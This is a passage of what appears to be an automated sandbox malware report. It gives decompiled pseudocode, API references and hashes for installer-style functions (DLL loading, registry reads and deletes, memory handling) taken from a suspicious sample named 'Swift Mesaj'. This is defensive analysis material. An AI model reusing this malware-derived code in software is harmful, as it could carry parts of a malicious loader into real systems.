						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t38 = E004066CB( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x3c)));
					if(_t38 == _t32) {
						E004052E6(0xfffffff7,  *((intOrPtr*)(_t39 - 0x3c)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40cdd4, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x20)));
							if( *_t38() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E00403930( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t37); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x0040202c
0x0040202c
0x00402031
0x00402038
0x004020f7
0x00402245
0x00402245
0x00402abf
0x00402ac2
0x00402ace
0x00402ace
0x00402047
0x00402051
0x00402054
0x00402064
0x00402068
0x00402070
0x00402073
0x004020f0
0x00000000
0x004020f0
0x00402075
0x00402080
0x00402084
0x004020c4
0x00402086
0x00402089
0x0040208c
0x004020b8
0x0040208e
0x00402091
0x0040209a
0x0040209c
0x0040209c
0x0040209a
0x0040208c
0x004020cc
0x004020e5
0x004020e5
0x00000000
0x004020cc
0x00402057
0x0040205f
0x00402062
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057

Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,762023A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,762023A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E), ref: 00405341
Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402068
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: a69309817c85ba968541a9951c146186ac4bb7107100abfe604f96daf0412f93
Instruction ID: 42f79ed1eba5b951ee52ea84f7896f3e8cd2b7b6c2435203e6ffc1da5cb37fd9
Opcode Fuzzy Hash: a69309817c85ba968541a9951c146186ac4bb7107100abfe604f96daf0412f93
Instruction Fuzzy Hash: EF21C271900208EACF20AFA5CE4DAAE7A70AF04358F64413BF611B51E0DBBD8941DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401B71 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401B71(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x20));
				_t30 =  *0x40cdd4; // 0x0
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x24)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x804); // executed
						_t34 = _t9;
						_t5 = _t34 + 4; // 0x4
						E004062A4(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x28)));
						_t12 =  *0x40cdd4; // 0x0
						 *_t34 = _t12;
						 *0x40cdd4 = _t34;
					} else {
						if(_t30 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t30 + 4; // 0x4
							E00406282(_t33, _t3);
							_push(_t30);
							 *0x40cdd4 =  *_t30;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t30 == _t28) {
							break;
						}
						_t30 =  *_t30;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t30 == _t28) {
								break;
							} else {
								_t32 = _t30 + 4;
								_t36 = L"Call";
								E00406282(_t36, _t30 + 4);
								_t22 =  *0x40cdd4; // 0x0
								E00406282(_t32, _t22 + 4);
								_t25 =  *0x40cdd4; // 0x0
								_push(_t36);
								_push(_t25 + 4);
								E00406282();
								L15:
								 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E004062A4(_t28, _t30, _t33, _t28, 0xffffffe8));
					E004058E4();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}

0x00401b71
0x00401b71
0x00401b74
0x00401b7c
0x00401bc5
0x00401bf3
0x00401bfc
0x00401bfe
0x00401c02
0x00401c07
0x00401c0c
0x00401c0e
0x00401bc7
0x00401bc9
0x00402885
0x00401bcf
0x00401bcf
0x00401bd4
0x00401bdb
0x00401bdc
0x00401be1
0x00401be1
0x00401bc9
0x00000000
0x00401b7e
0x00401b7e
0x00401b7e
0x00401b81
0x00000000
0x00000000
0x00401b87
0x00401b8b
0x00000000
0x00401b8d
0x00401b8f
0x00000000
0x00401b95
0x00401b95
0x00401b98
0x00401b9f
0x00401ba4
0x00401bae
0x00401bb3
0x00401bb8
0x00401bbc
0x004029db
0x00402abf
0x00402ac2
0x00402ac8
0x00402ac8
0x00401b8f
0x00000000
0x00401b8b
0x004022de
0x004022eb
0x004022ec
0x004022f1
0x004022f1
0x00402aca
0x00402ace

APIs

GlobalFree.KERNEL32(00000000), ref: 00401BE1
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3

Strings

Call, xrefs: 00401B98, 00401B9E, 00401BB8

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: 4d724161d6c5fb6bf4308d59b78a47a2fd90d80afd9eda06c823efa961cbcd01
Instruction ID: 92ace51ac37ea5806125e07fe733601b5cdc010b72bea360b2f02f73c4ad7c89
Opcode Fuzzy Hash: 4d724161d6c5fb6bf4308d59b78a47a2fd90d80afd9eda06c823efa961cbcd01
Instruction Fuzzy Hash: 4921C072A01100DFDB20EB94CE8495A76A9AF44318725013BF902F72D1DA78A9519B5D

Uniqueness

Uniqueness Score: -1.00%

Function 004024F2 Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004024F2(int* __ebx, intOrPtr __edx, short* __esi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				void* _t22;
				short* _t24;
				void* _t26;
				void* _t29;

				_t24 = __esi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402C77(_t29, 0x20019); // executed
				_t22 = _t9;
				_t10 = E00402C15(3);
				 *((intOrPtr*)(_t26 - 0x4c)) = _t21;
				 *__esi = __ebx;
				if(_t22 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
						_t13 = RegEnumValueW(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx); // executed
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t22, _t10, __esi, 0x3ff);
					}
					_t24[0x3ff] = _t16;
					_push(_t22);
					RegCloseKey();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x004024f2
0x004024f2
0x004024f2
0x004024f7
0x004024fe
0x00402500
0x00402508
0x0040250b
0x0040250e
0x00402885
0x00402514
0x0040251c
0x0040251f
0x00402538
0x0040253e
0x00402540
0x00402542
0x00402542
0x00402521
0x00402525
0x00402525
0x00402549
0x00402550
0x00402551
0x00402551
0x00402ac2
0x00402ace

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
RegEnumValueW.KERNELBASE(00000000,00000000,?,?), ref: 00402538
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp,00000000,00000011,00000002), ref: 00402551

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: c832eaacb46ec7e37e3c909b04b0f5a7b1d59f046349089feca9454346e38fdc
Instruction ID: 003629ead7c1dde4a3df59a88d33c100c9cba26094b7a58fe8a243c177e5491d
Opcode Fuzzy Hash: c832eaacb46ec7e37e3c909b04b0f5a7b1d59f046349089feca9454346e38fdc
Instruction Fuzzy Hash: 65018471904104EFE7159FA5DE89ABFB6BCEF44358F10403EF105A61D0DBB84E449B69

Uniqueness

Uniqueness Score: -1.00%

Function 1000289C Relevance: 3.2, APIs: 2, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E1000289C(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t31;
				void* _t32;
				long _t36;
				void* _t40;
				void* _t49;
				void* _t54;
				void* _t58;
				signed int _t65;
				void* _t70;
				void* _t79;
				intOrPtr _t81;
				signed int _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				void* _t92;
				void* _t94;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t106;
				intOrPtr _t107;

				if( *0x10004050 != 0 && E1000281E(_a4) == 0) {
					 *0x10004054 = _t106;
					if( *0x1000404c != 0) {
						_t106 =  *0x1000404c;
					} else {
						E10002DE0(E10002818(), __ecx);
						 *0x1000404c = _t106;
					}
				}
				_t31 = E1000285A(_a4);
				_t107 = _t106 + 4;
				if(_t31 <= 0) {
					L9:
					_t32 = E1000284E();
					_t81 = _a4;
					_t90 =  *0x10004058;
					 *((intOrPtr*)(_t32 + _t81)) = _t90;
					 *0x10004058 = _t81;
					E10002848();
					_t36 = SetFilePointer(??, ??, ??, ??); // executed
					 *0x10004034 = _t36;
					 *0x10004038 = _t90;
					if( *0x10004050 != 0 && E1000281E( *0x10004058) == 0) {
						 *0x1000404c = _t107;
						_t107 =  *0x10004054;
					}
					_t91 =  *0x10004058;
					_a4 = _t91;
					 *0x10004058 =  *((intOrPtr*)(E1000284E() + _t91));
					_t40 = E1000282C(_t91);
					_pop(_t92);
					if(_t40 != 0) {
						_t49 = E1000285A(_t92);
						if(_t49 > 0) {
							_push(_t49);
							_push(E10002865() + _a4 + _v8);
							_push(E1000286F());
							if( *0x10004050 <= 0 || E1000281E(_a4) != 0) {
								_pop(_t101);
								_pop(_t54);
								if( *((intOrPtr*)(_t101 + _t54)) == 2) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t102);
								_pop(_t58);
								 *0x1000404c =  *0x1000404c +  *(_t102 + _t58) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x10004058 == 0) {
						 *0x1000404c = 0;
					}
					_t94 = _a4 + E10002865();
					 *(E10002873() + _t94) =  *0x10004034;
					 *((intOrPtr*)(E10002877() + _t94)) =  *0x10004038;
					E10002887(_a4);
					if(E1000283A() != 0) {
						 *0x10004068 = GetLastError();
					}
					return _a4;
				}
				_push(E10002865() + _a4);
				_t65 = E1000286B();
				_v8 = _t65;
				_t88 = _t31;
				_push(_t77 + _t65 * _t88);
				_t79 = E10002877();
				_t100 = E10002873();
				_t103 = E1000286F();
				_t70 = _t88;
				if( *((intOrPtr*)(_t103 + _t70)) == 2) {
					_push( *((intOrPtr*)(_t79 + _t70)));
				}
				_push( *((intOrPtr*)(_t100 + _t70)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x100028ac
0x100028bd
0x100028ca
0x100028de
0x100028cc
0x100028d1
0x100028d6
0x100028d6
0x100028ca
0x100028e7
0x100028ec
0x100028f2
0x10002936
0x10002936
0x1000293b
0x10002940
0x10002946
0x10002948
0x1000294e
0x1000295b
0x1000295d
0x10002962
0x1000296f
0x10002982
0x10002988
0x1000298e
0x1000298f
0x10002995
0x100029a1
0x100029a7
0x100029af
0x100029b0
0x100029b3
0x100029be
0x100029c0
0x100029cc
0x100029d2
0x100029da
0x10002a06
0x10002a07
0x10002a0d
0x10002a0d
0x10002a14
0x100029ea
0x100029ea
0x100029eb
0x100029f9
0x10002a02
0x10002a02
0x100029da
0x100029be
0x10002a1d
0x10002a1f
0x10002a1f
0x10002a31
0x10002a3e
0x10002a4c
0x10002a52
0x10002a60
0x10002a68
0x10002a68
0x10002a76
0x10002a76
0x100028fd
0x100028fe
0x10002903
0x10002907
0x1000290c
0x10002920
0x10002921
0x10002922
0x10002924
0x10002929
0x1000292b
0x1000292b
0x1000292e
0x10002934
0x00000000

APIs

SetFilePointer.KERNELBASE(00000000), ref: 1000295B
GetLastError.KERNEL32 ref: 10002A62

Memory Dump Source

Source File: 00000001.00000002.7936337323.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.7936306097.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.7936376155.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.7936411270.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040247E(int* __ebx, char* __esi) {
				void* _t17;
				short* _t18;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402C77(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402C37(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x4c) = 0x800;
					if(RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x4c) != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E004061C9(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33);
					RegCloseKey();
				}
				 *0x434f88 =  *0x434f88 +  *(_t37 - 4);
				return 0;
			}

0x0040247e
0x0040247e
0x00402483
0x0040248a
0x0040248c
0x00402493
0x00402496
0x00402885
0x0040249c
0x0040249f
0x004024ba
0x004024ea
0x004024ea
0x004024ed
0x004024bc
0x004024c0
0x004024d9
0x004024e0
0x004024e3
0x004024c2
0x004024c5
0x004024d0
0x00402549
0x00000000
0x00000000
0x00000000
0x004024c5
0x004024c0
0x00402550
0x00402551
0x00402551
0x00402ac2
0x00402ace

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp,00000000,00000011,00000002), ref: 00402551

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 0938e9b4f9308f6345532a113f67175e1bd9ec8ec38cc62e7fbccb862b86bbb8
Instruction ID: 5dbb434a41a715d7517c89e318d331cd35bfdf9d93bbd69694c25902619df99f
Opcode Fuzzy Hash: 0938e9b4f9308f6345532a113f67175e1bd9ec8ec38cc62e7fbccb862b86bbb8
Instruction Fuzzy Hash: DC11A331910209EFEF24DFA4CA585BEB6B4EF04354F21843FE046A72C0D7B84A45DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x434f30;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x433ecc =  *0x433ecc + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433ecc, 0x7530,  *0x433eb4), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402388(void* __ebx) {
				long _t7;
				void* _t10;
				void* _t14;
				long _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t23;

				_t14 = __ebx;
				_t26 =  *(_t23 - 0x18) - __ebx;
				_t20 =  *((intOrPtr*)(_t23 - 0x24));
				if( *(_t23 - 0x18) != __ebx) {
					_t7 = E00402CF5(__eflags, _t20, E00402C37(0x22),  *(_t23 - 0x18) >> 1); // executed
					_t18 = _t7;
					goto L4;
				} else {
					_t10 = E00402C77(_t26, 2); // executed
					_t22 = _t10;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueW(_t22, E00402C37(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t14) {
							goto L6;
						}
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}

0x00402388
0x00402388
0x0040238b
0x0040238e
0x004023ca
0x004023cf
0x00000000
0x00402390
0x00402392
0x00402397
0x0040239b
0x00402885
0x00402885
0x004023a1
0x004023b1
0x004023b3
0x004023d1
0x004023d3
0x00000000
0x004023d9
0x004023d3
0x0040239b
0x00402ac2
0x00402ace

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
RegCloseKey.ADVAPI32(00000000), ref: 004023B3

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: fccc67dc7d506ba8a36f8f9ce9b9504af6e86eb791f9cdf3a62a8028c2eeb98f
Instruction ID: a65daa511511277569afb244ca8fe97b80a25767db049908362439423f8cf232
Opcode Fuzzy Hash: fccc67dc7d506ba8a36f8f9ce9b9504af6e86eb791f9cdf3a62a8028c2eeb98f
Instruction Fuzzy Hash: E5F09632A041149BE711BBA49B4EABEB2A99B44354F16043FFA02F71C1DEFC4D41966D

Uniqueness

Uniqueness Score: -1.00%

Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E61
EnableWindow.USER32(00000000,00000000), ref: 00401E6C

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
